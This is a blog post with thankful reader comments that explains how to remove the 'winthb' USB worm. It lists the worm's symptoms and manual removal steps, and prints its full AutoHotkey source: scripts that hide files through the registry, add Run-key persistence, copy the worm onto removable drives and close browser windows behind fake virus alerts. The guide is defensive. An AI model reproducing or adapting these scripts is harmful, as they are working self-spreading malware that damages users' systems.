winthb is a virus program recently came to my system from a usb flash device. It hides the hidden folders completely and copies the autorun.inf file to c: drive and reproduces it whenever we delete that.The icon of the c: drive changes to something like below
The virus program also has the symptoms listed below,
1. when we try to search orkut in google, it will display an error message " WARNING,orkut is sending viruses to your pc. To protect your pc close this window ,orkut is infected by jammer worm " also it will play a music . (win.mp3)
2. when we try youtube ,WARNING,Dangerous script send by youtube, Windows system files damage if this script run
3.In my system mozilla firefox was disabled when the thb fellow came ,anyway the firefox showed "File missing,TCP/IP module Missing from npqtplugin4.dll. it may infected by virus"
How to remove winthb virus
take start>run>enter temp
clear the directory
also run %temp
clear that also
As a first step when u boot into windows press ALT+CTRL+DEL.Stop the process win.exe and avgs.exe if they are running.Goto run type regedit(enter).Then the registry editor window will come.[1]Goto HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue will be made 0 by the program make it 1.
Now all the hidden files will be available. Goto Tools>folderoptions>view>show all hidden files.
Now search for avgs.exe in the windows search engine.If there is a file available in the search loacte its path.Do not double click on any drives to get into them because most of the viruses get into system when we double click on the drive by running the autorun.inf file.If we have to , do a adreess bar opening .I got the fellows from my C:\windows\system32\win.dll\
the folder icon for win.dll was not appearing as a usual folder icon it was the icon for dll files and also it was hidden. So please do not run any virus while doing these.If u do so u wont see the hidden files. In this case u have to do the [1].FInd the folder and delete it. Find any file named win.exe ,avgs.exe,.The folder C:\windows\system32\win.dll\ contained some files named
win.exe
avgs.exe
Desktop.ini
std.txt
Drivelist.txt
Icon.ico
reproduce.txt
win.mp3
thb.ico
Dll.ico
script1.txt
The virus script looks like the one below,
std.txt
#notrayicon
#singleinstance,ignore
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,0
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,0
Run D:\RECYCLE\win.exe D:\RECYCLE\script1.txt
Run D:\RECYCLE\avgs.exe D:\RECYCLE\reproduce.txt
reproduce.txt
#notrayicon
#persistent
ArrayCount = 0
Loop, Read,D:\RECYCLE\driveList.txt
{
ArrayCount += 1
Array%ArrayCount% := A_LoopReadLine
}
dat1=%userprofile%
settimer,reproduce,5000
return
reproduce:
Loop %ArrayCount%
{
element := Array%A_Index%
driveget,data,Type,%element%:\
ifequal,data,Removable
{
driveget,data1,status,%element%:\
ifequal,data1,Ready
{
FileCopydir,D:\RECYCLE\reg.bkp,%element%:\,1
}
}
}
regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon
ifnotequal,regdata,D:\RECYCLE\win.exe D:\RECYCLE\std.txt
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon,D:\RECYCLE\win.exe D:\RECYCLE\std.txt
ifnotexist,c:\thb.ico
ifnotexist,c:\autorun.inf
filedelete,c:\autorun.inf
Filecopy,C:\DOCUME~1\Ravi\LOCALS~1\Temp\winthb\thb.ico,c:\
Filecopy,C:\DOCUME~1\Ravi\LOCALS~1\Temp\winthb\autorun.inf,c:\
return
script1.txt
#persistent
#notrayicon
settimer,ban,2000
return
ban:
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,D:\RECYCLE\win.mp3
msgbox,262160,WARNING,orkut is sending viruses to your pc. To protect your pc close this window `r`r orkut is infected by jammer worm ,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,D:\RECYCLE\win.mp3
msgbox,262160,WARNING,Dangerous script send by youtube, Windows system files damage if this script run`r`r
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,File missing,TCP/IP module Missing from npqtplugin4.dll. it may infected by virus `r`r ,30
return
}
ifwinactive ahk_class IEFrame
{
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,D:\RECYCLE\win.mp3
msgbox,262160,WARNING,orkut is sending viruses to your pc. To protect your pc close this window `r`r orkut is infected by jammer worm ,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,D:\RECYCLE\win.mp3
msgbox,262160,WARNING,orkut is sending viruses to your pc. To protect your pc close this window `r`r orkut is infected by jammer worm ,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,D:\RECYCLE\win.mp3
msgbox,262160,WARNING,orkut is sending viruses to your pc. To protect your pc close this window `r`r orkut is infected by jammer worm ,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,D:\RECYCLE\win.mp3
msgbox,262160,WARNING,orkut is sending viruses to your pc. To protect your pc close this window `r`r orkut is infected by jammer worm ,30
return
}
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,D:\RECYCLE\win.mp3
msgbox,262160,WARNING,Dangerous script send by youtube, Windows system files damage if this script run`r`r
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,D:\RECYCLE\win.mp3
msgbox,262160,WARNING,Dangerous script send by youtube, Windows system files damage if this script run`r`r
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,D:\RECYCLE\win.mp3
msgbox,262160,WARNING,Dangerous script send by youtube, Windows system files damage if this script run`r`r
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,D:\RECYCLE\win.mp3
msgbox,262160,WARNING,Dangerous script send by youtube, Windows system files damage if this script run`r`r
return
}
}
return
- Creates c:\windows\system32\win.dll\svchost.exe
- create folder C:\WINDOWS\system32\win.dll
- create folder C:\WINDOWS\system32\win.dll\reg.bkp
- Copies filec:\docume~1\user\locals~1\temp\winthb\win.exe to c:\windows\system32\win.dll\win.exe
- Copies filec:\docume~1\user\locals~1\temp\winthb\avgs.exe to c:\windows\system32\win.dll\avgs.exe
- Copies filec:\docume~1\user\locals~1\temp\winthb\drivelist.txt to c:\windows\system32\win.dll\drivelist.txt
- Copies filec:\docume~1\user\locals~1\temp\winthb\win.mp3 to c:\windows\system32\win.dll\win.mp3
- Copies filec:\docume~1\user\locals~1\temp\winthb\Icon.ico to c:\windows\system32\win.dll\Icon.ico
- Copies filec:\docume~1\user\locals~1\temp\winthb\thb.ico to c:\windows\system32\win.dll\thb.ico
- Copies filec:\docume~1\user\locals~1\temp\winthb\DLL.ico to c:\windows\system32\win.dll\DLL.ico
- Deletes c:\autorun.inf
- Copies filec:\docume~1\user\locals~1\temp\winthb\thb.ico to c:\thb.ico
- Copies filec:\docume~1\user\locals~1\temp\winthb\autorun.inf to c:\autorun.inf
After all these things i found a copy of the thb files in my D:\RECYCLE it looked like RECYCLER but there was no R at the end.Clear that aslo.Also idont know whether the script has any other effects.If any feel free to comment.Thanks
9 comments:
Thank you Mr.. Thank you very much..
It helped me..
thanks mannn it helped me also!!!
man hats off to u.a genius......this worm was pissing me since ages.... A BIG THANK U
wow nice article.. btw what language are these scripts?
Thank U man... Thank U very much. That much I suffered by this virus.
@Vivek
The language is clearly AutoHotKey scripting, which is an open source scripting language automation and macro creation in Windows. Very similar to AutoIt scripting language.
Regards
Helper
thanks a ton dude...
also, you might want to delete the prefetch files of win.exe, avgs.exe etc from your prefetch folder :
c:\windows\prefetch
thanks for the information Mr sk
also thanks for the comments
Thank you so much for this valuable information.
Post a Comment